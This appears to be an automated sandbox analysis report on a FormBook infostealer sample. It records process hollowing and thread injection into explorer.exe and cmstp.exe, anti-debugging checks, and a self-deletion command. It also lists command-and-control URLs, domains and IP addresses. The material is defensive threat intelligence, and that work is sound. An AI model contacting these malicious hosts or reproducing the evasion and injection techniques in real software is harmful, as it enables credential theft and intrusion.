Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0465AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0465AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0467FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_046DFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0467D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0467D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0464DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0465FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04718F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04673B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04673B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0464DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0465EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04718B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0464F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04644F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04644F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmstp.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 1_2_00409B50 LdrLoadDll,
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_100057F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 104.248.163.187 80
Source: C:\Windows\explorer.exe | Domain query: www.tankomixing.com
Source: C:\Windows\explorer.exe | Domain query: www.leads-mania.club
Source: C:\Windows\explorer.exe | Network Connect: 217.160.0.33 80
Source: C:\Windows\explorer.exe | Domain query: www.bezhantrading.com
Source: C:\Windows\explorer.exe | Domain query: www.americanvisionvinyl.com
Source: C:\Windows\explorer.exe | Network Connect: 46.38.243.234 80
Source: C:\Windows\explorer.exe | Domain query: www.iccsukltd.com
Source: C:\Windows\explorer.exe | Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe | Domain query: www.affiliatemarketingproducts.xyz
Source: C:\Windows\explorer.exe | Network Connect: 153.127.214.206 80
Source: C:\Windows\explorer.exe | Network Connect: 138.68.74.116 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 172.67.184.156 80
Source: C:\Windows\explorer.exe | Domain query: www.worryterrible.space
Source: C:\Windows\explorer.exe | Domain query: www.alles-abgedeckt.com
Source: C:\Windows\explorer.exe | Domain query: www.dempseynutrition.com
Source: C:\Windows\explorer.exe | Domain query: www.harada-insatsu.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: D0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Memory written: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\cmstp.exe | Thread register set: target process: 3440
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Process created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmp | Binary or memory string: &Program Manager
Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_10004343 cpuid
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_1000568B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe | Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules 1 | Application Shimming 1 | Process Injection 612 | Virtualization/Sandbox Evasion 2 | Input Capture 1 | System Time Discovery 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Application Shimming 1 | Process Injection 612 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Security Software Discovery 251 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Virtualization/Sandbox Evasion 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Process Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 114 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

Behavior Graph ID: 515499 | Sample: nowy przyk#U0142adowy katalog.exe | Start date: 04/11/2021 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP info: www.sddn13.xyz; sddn13.xyz
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 9 other signatures
  -> nowy przyk#U0142adowy katalog.exe (started)
     DNS/IP info: 192.168.2.1 unknown unknown
     Created file: C:\Users\user\AppData\Local\...\rarelsbsy.dll, PE32 (dropped)
     Signatures: Injects a PE file into a foreign processes
     -> nowy przyk#U0142adowy katalog.exe (started)
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        -> explorer.exe (injected)
           DNS/IP info: harada-insatsu.com 153.127.214.206, 49773, 80 SAKURA-ASAKURAInternetIncJP Japan; www.iccsukltd.com 217.160.0.33, 49770, 80 ONEANDONE-ASBrauerstrasse48DE Germany; 17 other IPs or domains
           Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
           -> cmstp.exe (started)
              Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              -> cmd.exe (started)
                 -> conhost.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
nowy przyk#U0142adowy katalog.exe | 30% | ReversingLabs | Win32.Backdoor.Zapchast
nowy przyk#U0142adowy katalog.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll | 14% | ReversingLabs | Win32.Backdoor.Zapchast

Unpacked PE Files

Source | Detection | Scanner | Label
1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
11.2.cmstp.exe.4b5796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.0.nowy przyk#U0142adowy katalog.exe.400000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen2
1.0.nowy przyk#U0142adowy katalog.exe.400000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen2
1.0.nowy przyk#U0142adowy katalog.exe.400000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen2
1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
11.2.cmstp.exe.3bbc28.1.unpack | 100% | Avira | TR/Patched.Ren.Gen

Domains

Source | Detection | Scanner | Label
harada-insatsu.com | 0% | Virustotal |
bezhantrading.com | 6% | Virustotal |
www.iccsukltd.com | 1% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://www.affiliatemarketingproducts.xyz/wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 | 0% | Avira URL Cloud | safe
http://www.bezhantrading.com/wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 | 0% | Avira URL Cloud | safe
www.bezhantrading.com/wtcv/ | 0% | Avira URL Cloud | safe
http://www.worryterrible.space/wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== | 0% | Avira URL Cloud | safe
http://www.harada-insatsu.com/wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 | 0% | Avira URL Cloud | safe
http://www.tankomixing.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== | 0% | Avira URL Cloud | safe
http://www.alles-abgedeckt.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== | 0% | Avira URL Cloud | safe
http://www.americanvisionvinyl.com/wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 | 0% | Avira URL Cloud | safe
http://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 | 0% | Avira URL Cloud | safe
http://www.iccsukltd.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
harada-insatsu.com | 153.127.214.206 | true | true | | unknown
bezhantrading.com | 104.248.163.187 | true | true | | unknown
www.iccsukltd.com | 217.160.0.33 | true | true | | unknown
td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | false | | unknown
americanvisionvinyl.com | 34.102.136.180 | true | false | | unknown
www.affiliatemarketingproducts.xyz | 172.67.184.156 | true | true | | unknown
sddn13.xyz | 50.118.182.205 | true | true | | unknown
worryterrible.space | 34.102.136.180 | true | false | | unknown
www.alles-abgedeckt.com | 46.38.243.234 | true | true | | unknown
leads-mania.club | 138.68.74.116 | true | true | | unknown
www.tankomixing.com | unknown | unknown | true | | unknown
www.sddn13.xyz | unknown | unknown | true | | unknown
www.leads-mania.club | unknown | unknown | true | | unknown
www.worryterrible.space | unknown | unknown | true | | unknown
www.bezhantrading.com | unknown | unknown | true | | unknown
www.americanvisionvinyl.com | unknown | unknown | true | | unknown
www.dempseynutrition.com | unknown | unknown | true | | unknown
www.harada-insatsu.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.affiliatemarketingproducts.xyz/wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 | true | Avira URL Cloud: safe | unknown
http://www.bezhantrading.com/wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 | true | Avira URL Cloud: safe | unknown
www.bezhantrading.com/wtcv/ | true | Avira URL Cloud: safe | low
http://www.worryterrible.space/wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== | false | Avira URL Cloud: safe | unknown
http://www.harada-insatsu.com/wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 | true | Avira URL Cloud: safe | unknown
http://www.tankomixing.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== | false | Avira URL Cloud: safe | unknown
http://www.alles-abgedeckt.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== | true | Avira URL Cloud: safe | unknown
http://www.americanvisionvinyl.com/wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 | false | Avira URL Cloud: safe | unknown
http://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 | true | Avira URL Cloud: safe | unknown
http://www.iccsukltd.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | nowy przyk#U0142adowy katalog.exe | false | | high
http://nsis.sf.net/NSIS_ErrorError | nowy przyk#U0142adowy katalog.exe | false | | high
http://browsehappy.com/ | cmstp.exe, 0000000B.00000002.620985574.0000000004CD2000.00000004.00020000.sdmp | false | | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.248.163.187 | bezhantrading.com | United States | 14061 | DIGITALOCEAN-ASNUS | true
35.246.6.109 | td-balancer-euw2-6-109.wixdns.net | United States | 15169 | GOOGLEUS | false
153.127.214.206 | harada-insatsu.com | Japan | 7684 | SAKURA-ASAKURAInternetIncJP | true
138.68.74.116 | leads-mania.club | United States | 14061 | DIGITALOCEAN-ASNUS | true
34.102.136.180 | americanvisionvinyl.com | United States | 15169 | GOOGLEUS | false
172.67.184.156 | www.affiliatemarketingproducts.xyz | United States | 13335 | CLOUDFLARENETUS | true
217.160.0.33 | www.iccsukltd.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
46.38.243.234 | www.alles-abgedeckt.com | Germany | 197540 | NETCUP-ASnetcupGmbHDE | true

Private

IP
192.168.2.1

                                                General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 515499
Start date: 04.11.2021
Start time: 11:46:58
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 34s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: nowy przyk#U0142adowy katalog.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/2@11/9
EGA Information: Failed
HDC Information:
• Successful, ratio: 31.3% (good quality ratio 28.4%)
• Quality average: 73.6%
• Quality standard deviation: 31.7%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Processes excluded from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• IPs excluded from analysis (whitelisted): 20.49.150.241, 51.11.168.232
• Domains excluded from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, settingsfd-geo.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

Match | Associated Sample Name / URL | Detection | Context
104.248.163.187 | #Uc81c#Ud488 #Uce74#Ud0c8#Ub85c#Uadf823.exe | malicious | www.bezhantrading.com/wtcv/?jXF0i=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+U8jWB5TDN3B&E48PcH=s4SDBdZH
104.248.163.187 | EQ034989.exe | malicious | www.bezhantrading.com/wtcv/?p8bLu=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+U8JJxJTHP/B&3fyTKn=C2MDbjTp
104.248.163.187 | cat#U00e1logo de productos2021.exe | malicious | www.bezhantrading.com/wtcv/?8p=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+U8jWB5TDN3B&6lQL=e48to28xCrLPt0sP
153.127.214.206 | EQ034989.exe | malicious | www.harada-insatsu.com/wtcv/?p8bLu=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qws3oxF3Klxqa&3fyTKn=C2MDbjTp
172.67.184.156 | EQ034989.exe | malicious | www.affiliatemarketingproducts.xyz/wtcv/?p8bLu=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+v3fb5eH+BFz&3fyTKn=C2MDbjTp
172.67.184.156 | cat#U00e1logo de productos2021.exe | malicious | www.affiliatemarketingproducts.xyz/wtcv/?8p=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+v31EJuH6DNz&6lQL=e48to28xCrLPt0sP
217.160.0.33 | EQ034989.exe | malicious | www.iccsukltd.com/wtcv/?p8bLu=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n/VdZfFb4jod&3fyTKn=C2MDbjTp

                                                Domains

